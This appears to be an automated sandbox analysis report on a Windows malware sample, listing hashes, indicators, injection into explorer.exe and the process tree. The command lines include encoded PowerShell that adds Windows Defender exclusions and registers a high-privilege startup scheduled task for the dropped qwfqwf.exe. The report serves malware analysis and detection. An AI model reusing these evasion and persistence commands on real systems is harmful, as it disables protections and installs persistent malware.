Analysis
- max time kernel: 299s
- max time network: 303s
- platform: windows10-1703_x64
- resource: win10-20220901-en
- resource tags: arch:x64, arch:x86, image:win10-20220901-en, locale:en-us, os:windows10-1703-x64, system
- submitted: 17/09/2022, 10:23
Static task
- static1
Behavioral tasks
- behavioral1: sample af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe, resource win7-20220812-en
- behavioral2: sample af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe, resource win10-20220901-en
General
- Target: af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe
- Size: 2.5MB
- MD5: 0119f6316586f89f83c24254c6927dd9
- SHA1: eb462b622d6038638889154839238105a17f508b
- SHA256: af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e
- SHA512: f864b04c6906abd03db89d85d9fde4cf7a35078fac9dbc51ba2285adc8bbc4e5d46cb351b4d6ad59bf04949ec851571f655a09fb2322709c06357daae8283653
- SSDEEP: 49152:35mGlO0aBsajwiCzLaeG862uwnYn9fRLdrAoVMkTEHMUHqyuWoG:0G8/Bspp/p+3rjspTj
Malware Config
Signatures
Executes dropped EXE 2 IoCs
- PID 4864: qwfqwf.exe
- PID 4576: explorer.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs
Drops file in System32 directory 5 IoCs
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\qwfqwf.exe.log (qwfqwf.exe)
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (powershell.exe)
- File opened for modification: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
- File opened for modification: C:\Windows\system32\config\systemprofile\AppData\Roaming\4BFD.tmp (qwfqwf.exe)
Suspicious use of SetThreadContext 1 IoCs
- PID 4864 (qwfqwf.exe) set thread context of PID 4576 (procid_target 81)
Drops file in Program Files directory 3 IoCs
- File created: C:\Program Files\qwfqwf.exe (af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe)
- File opened for modification: C:\Program Files\qwfqwf.exe (af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe)
- File created: C:\Program Files\Google\Libs\WR64.sys (qwfqwf.exe)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Modifies data under HKEY_USERS 64 IoCs
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of WriteProcessMemory 18 IoCs
- PID 2484 (af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe) wrote to memory of PID 3340 (procid_target 66)
- PID 2484 (af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe) wrote to memory of PID 3340 (procid_target 66)
- PID 2484 (af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe) wrote to memory of PID 3044 (procid_target 69)
- PID 2484 (af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe) wrote to memory of PID 3044 (procid_target 69)
- PID 2484 (af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe) wrote to memory of PID 4108 (procid_target 72)
- PID 2484 (af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe) wrote to memory of PID 4108 (procid_target 72)
- PID 4108 (cmd.exe) wrote to memory of PID 4240 (procid_target 74)
- PID 4108 (cmd.exe) wrote to memory of PID 4240 (procid_target 74)
- PID 4864 (qwfqwf.exe) wrote to memory of PID 3160 (procid_target 76)
- PID 4864 (qwfqwf.exe) wrote to memory of PID 3160 (procid_target 76)
- PID 4864 (qwfqwf.exe) wrote to memory of PID 900 (procid_target 78)
- PID 4864 (qwfqwf.exe) wrote to memory of PID 900 (procid_target 78)
- PID 4864 (qwfqwf.exe) wrote to memory of PID 8 (procid_target 80)
- PID 4864 (qwfqwf.exe) wrote to memory of PID 8 (procid_target 80)
- PID 4864 (qwfqwf.exe) wrote to memory of PID 8 (procid_target 80)
- PID 4864 (qwfqwf.exe) wrote to memory of PID 4576 (procid_target 81)
- PID 4864 (qwfqwf.exe) wrote to memory of PID 4576 (procid_target 81)
- PID 4864 (qwfqwf.exe) wrote to memory of PID 4576 (procid_target 81)
Processes
- C:\Users\Admin\AppData\Local\Temp\af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe (level 1, PID 2484)
  Command line: "C:\Users\Admin\AppData\Local\Temp\af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe"
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 2, PID 3340)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAdwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAYgBtAHQAIwA+ACAAQAAoACAAPAAjAGEAdABzACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBlAGgAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAaABrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAdwBlACMAPgA="
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 2, PID 3044)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "…"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\cmd.exe (level 2, PID 4108)
    Command line: "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "qwfqwf"
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\schtasks.exe (level 3, PID 4240)
      Command line: schtasks /run /tn "qwfqwf"
- C:\Program Files\qwfqwf.exe (level 1, PID 4864)
  Command line: "C:\Program Files\qwfqwf.exe"
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Modifies data under HKEY_USERS
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 2, PID 3160)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAdwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAYgBtAHQAIwA+ACAAQAAoACAAPAAjAGEAdABzACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBlAGgAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAaABrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAdwBlACMAPgA="
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 2, PID 900)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZwAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwAiAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABxAHcAZgBxAHcAZgAuAGUAeABlACIAJwApACAAPAAjAHAAaQAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQAUwB0AGEAcgB0AHUAcAApACAAPAAjAHIAcgAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAHIAYwB0AHIAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAHEAdwBmAHEAdwBmACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAZQBuACMAPgA7AA=="
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\System32\conhost.exe (level 2, PID 8)
    Command line: C:\Windows\System32\conhost.exe "dplckqvqeii"
  - C:\Windows\explorer.exe (level 2, PID 4576)
    Command line: C:\Windows\explorer.exe oiwyeszwfgcchj0 …
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v6
Downloads